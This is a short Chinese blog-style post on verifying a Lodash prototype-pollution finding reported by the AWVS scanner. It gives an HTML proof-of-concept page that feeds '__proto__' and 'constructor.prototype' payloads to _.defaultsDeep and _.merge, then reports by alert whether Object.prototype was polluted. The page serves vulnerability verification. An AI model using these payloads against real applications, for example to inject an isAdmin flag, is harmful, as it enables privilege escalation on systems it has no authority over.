作为一名漏扫攻城狮,时不时会在AWVS中看到lodash这个漏洞,但是我只管导出报告,该怎么验证呢?
验证POC
下面就是用于验证的POC,把这个html中的src进行修改为扫描的网站中的lodash.min.js然后浏览器打开
<!DOCTYPE html>
<html>
<head>
<title>Lodash 原型污染测试</title>
<!-- 加载 Lodash -->
<!-- 这里修改src中的链接 -->
<script src="https://cdn.jsdelivr.net/npm/[email protected]/lodash.min.js"></script>
</head>
<body>
<script>
// 测试代码
const payload = '{"constructor": {"prototype": {"lodash": true}}}';
_.defaultsDeep({}, JSON.parse(payload));
if ({}.lodash === true) {
alert("⚠️ 漏洞存在!\n你的 Lodash 版本存在原型污染风险 (CVE-2018-3721, CVE-2019-10744)");
} else {
alert("✅ 安全!\n你的 Lodash 版本已修复注入漏洞");
}
</script>
<script>
// 测试代码
const maliciousPayload = JSON.parse('{"__proto__": {"isAdmin": true}}');
_.merge({}, maliciousPayload);
// 检查是否污染成功
if ({}.isAdmin === true) {
alert("⚠️ 漏洞存在!\nObject.prototype 已被污染,isAdmin=true");
} else {
alert("✅ 安全!\n未检测到原型污染");
}
</script>
</body>
</html>展示效果
